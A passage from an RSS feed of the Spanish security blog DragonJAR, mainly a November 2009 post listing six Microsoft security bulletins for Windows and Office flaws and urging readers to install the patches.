Cofee</a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/como-quemar-archivo-dmg-en-windows.xhtml" title="Como quemar un archivo DMG en Windows y GNU Linux">Como quemar un archivo DMG en Windows y GNU Linux</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/recogiendo-evidencias-analisis-forense-windows.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Parches para Windows que corrigen Vulnerabilidades Criticas</title>
		<link>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml</link>
		<comments>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml#comments</comments>
		<pubDate>Wed, 11 Nov 2009 00:29:20 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Noticias Software]]></category>
		<category><![CDATA[Criticas]]></category>
		<category><![CDATA[Ejecución]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Parche]]></category>
		<category><![CDATA[Remoto]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3332</guid>
		<description><![CDATA[Microsoft ha publicado hoy martes 10 de noviembre,  6 boletines de seguridad que contiene parches para resolver 15 fallos de seguridad en Microsoft Windows y Microsoft Office.

Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una de [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft ha publicado hoy martes 10 de noviembre,  6 boletines de seguridad que contiene parches para resolver 15 fallos de seguridad en Microsoft Windows y Microsoft Office.</p>
<p style="text-align: center;"><img class="alignnone" title="Fallos en Microsoft Windows" src="http://farm3.static.flickr.com/2713/4094141864_29bca9afa8_o.jpg" alt="4094141864 29bca9afa8 o Parches para Windows que corrigen Vulnerabilidades Criticas" width="320" height="214" /></p>
<p>Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una de las aplicaciones vulnerables, les dejo un listado con los fallos de seguridad y el software afectado para que puedan determinar si tienen software vulnerable e instalen los parches:<span id="more-3332"></span></p>
<ul>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-063.mspx">Boletin de Seguridad  MS09-063 &#8211; Critico<br />
Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-064.mspx">Boletin de Seguridad MS09-064 &#8211; Critico</a><br />
<a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-064.mspx">Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-065.mspx">Boletin de Seguridad MS09-065 &#8211; Critico<br />
Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-066.mspx">Boletin de Seguridad MS09-066 &#8211; Importante<br />
Vulnerability in Active Directory Could Allow Denial of Service (973309)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-067.mspx">Boletin de Seguridad MS09-067 &#8211; Importante<br />
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)</a></li>
<li><a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/Bulletin/MS09-068.mspx">Boletin de Seguridad MS09-068 &#8211; Importante<br />
Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)</a></li>
</ul>
<p>Es muy recomendable que actualices tu sistema operativo y tu suite ofimática para evitar la oleada de gusanos y malware que no demoran en explotar estos fallos para propagarse por toda la red.</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=es">Actualizar tu Windows desde la pagina de Microsoft Windows Update</a></h2>
<p><strong>Fuente:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.microsoft.com/technet/security/current.aspx">Microsoft Security Bulletin </a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a href="http://www.dragonjar.org/la-mejor-defensa-es-la-informacion.xhtml" title="La Mejor Defensa es la Información">La Mejor Defensa es la Información</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-8-nuevas-actualizaciones-de-seguridad.xhtml" title="Microsoft publica 8 Nuevas Actualizaciones de seguridad">Microsoft publica 8 Nuevas Actualizaciones de seguridad</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
